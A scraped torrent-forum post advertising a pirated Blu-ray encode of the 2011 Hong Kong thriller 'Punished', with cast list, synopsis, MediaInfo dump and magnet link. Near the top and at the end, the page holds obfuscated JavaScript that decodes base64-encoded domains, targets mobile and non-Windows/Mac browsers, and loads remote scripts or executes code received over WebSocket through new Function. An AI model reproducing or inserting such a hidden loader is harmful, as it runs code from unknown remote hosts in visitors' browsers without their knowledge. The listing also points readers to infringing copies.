报应[国粤语配音/中文字幕].Punished.2011.1080p.BluRay.x265.10bit.DTS.2Audio 6.30GB

版主小s 27天前 316

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 报应 / 迷途追凶 / Punished / Bou ying

◎片 名 報應

◎年 代 2011

◎产 地 中国香港

◎类 别 惊悚 / 犯罪

◎语 言 粤语

◎上映日期 2011-07-12(中国大陆) / 2011-05-05(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt1604670/

◎豆瓣评分 5.8/10 (8979人评价)

◎豆瓣链接 https://movie.douban.com/subject/4310059/

◎片 长 94分钟

◎导 演 罗永昌 Wing-cheong Law (id:1274489)

◎编 剧 冯志强 Chi Keung Fung (id:1321488)

林逢 Fung Lam (id:1339119)

◎演 员 黄秋生 Anthony Wong Chau-Sang (id:1050076)

任贤齐 Richie Jen (id:1009888)

文咏珊 Janice Man (id:1275670)

张可颐 Maggie Cheung Ho Yee (id:1073994)

卢巧音 Candy Lo (id:1028993)

恭硕良 Jun Kung (id:1275254)

曹查理 Charlie Cho (id:1275320)

叶景文 King-Man Yip (id:1397259)

林敬刚 King-Kong Lam (id:1315070)

杜琪峰 Johnnie To (id:1160186)

黄庆勋 Danny Wong (id:1400030)

庄澄 John Chong (id:1280710)

罗健铭 Kenny Lo (id:1357542)

◎标 签 香港 / 犯罪 / 银河映像 / 悬疑 / 2011 / 剧情 / 人性 / 动作

◎简 介

虽已身价千万,功成名就,但是大老板王浩潮(黄秋生 饰)身心始终得不到放松。在外有征地事宜搅扰不堪,内有女儿黛丝(文咏姗 饰)青春叛逆,沉湎毒品无法自拔。在一次父女争吵过后,黛丝神秘失踪,不久一段绑架录像便送到王的手中。起初以为是女儿布下的骗局,王只得被迫就范。谁知五千万赎金奉出,女儿仍不见下落。万般无奈,他委托忠心耿耿的保镖——曾经混过江湖的阿初(任贤齐 饰)调查女儿行踪,最终见到的却是黛丝冰冷的尸体。

王悲痛欲绝,发誓要让绑匪付出代价。他向所有人隐瞒黛丝已死的事实,单单倚重阿初与其一起踏上复仇的征途。因果报应,丝毫不爽……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 243443165489908765509743459338464738448 (0xB72572BE5F2ED1FC154A8579D8173C90)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.30 GiB

  8. Duration : 1 h 33 min

  9. Overall bit rate : 9 619 kb/s

  10. Encoded date : UTC 2021-11-03 05:08:56

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 33 min

  20. Bit rate : 7 439 kb/s

  21. Width : 1 920 pixels

  22. Height : 814 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.198

  30. Stream size : 4.87 GiB (77%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=16.3000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.75 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x814 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 33 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossy

  50. Stream size : 1 012 MiB (16%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4354 (0x1102)

  59. Format : AC-3

  60. Format/Info : Audio Coding 3

  61. Commercial name : Dolby Digital

  62. Codec ID : A_AC3

  63. Duration : 1 h 33 min

  64. Bit rate mode : Constant

  65. Bit rate : 640 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : L R C LFE Ls Rs

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 31.250 FPS (1536 SPF)

  70. Compression mode : Lossy

  71. Stream size : 429 MiB (7%)

  72. Title : Mandarin

  73. Language : Chinese

  74. Service kind : Complete Main

  75. Default : No

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #1

  79. ID : 4

  80. ID in the original source medium : 4609 (0x1201)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 27 min

  86. Bit rate : 25.4 kb/s

  87. Count of elements : 1662

  88. Stream size : 16.0 MiB (0%)

  89. Title : chs

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #2

  95. ID : 5

  96. ID in the original source medium : 4608 (0x1200)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 27 min

  102. Bit rate : 28.6 kb/s

  103. Count of elements : 1662

  104. Stream size : 18.0 MiB (0%)

  105. Title : cht

  106. Language : Chinese

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #3

  111. ID : 6

  112. ID in the original source medium : 4610 (0x1202)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 27 min

  118. Bit rate : 29.7 kb/s

  119. Count of elements : 1662

  120. Stream size : 18.7 MiB (0%)

  121. Title : eng

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : 第 01 章

  128. 00:04:32.916 : 第 02 章

  129. 00:08:36.041 : 第 03 章

  130. 00:12:47.666 : 第 04 章

  131. 00:16:04.458 : 第 05 章

  132. 00:21:09.166 : 第 06 章

  133. 00:24:43.125 : 第 07 章

  134. 00:28:39.041 : 第 08 章

  135. 00:32:15.333 : 第 09 章

  136. 00:36:58.583 : 第 10 章

  137. 00:42:02.083 : 第 11 章

  138. 00:48:04.916 : 第 12 章

  139. 00:54:42.166 : 第 13 章

  140. 00:58:22.541 : 第 14 章

  141. 01:03:17.083 : 第 15 章

  142. 01:08:08.708 : 第 16 章

  143. 01:13:28.875 : 第 17 章

  144. 01:19:05.000 : 第 18 章

  145. 01:26:36.041 : 第 19 章

  146. 01:29:21.166 : 第 20 章




复制代码


TAGS 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:14E41565CE573DF238269373078D0950BFCC3221

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};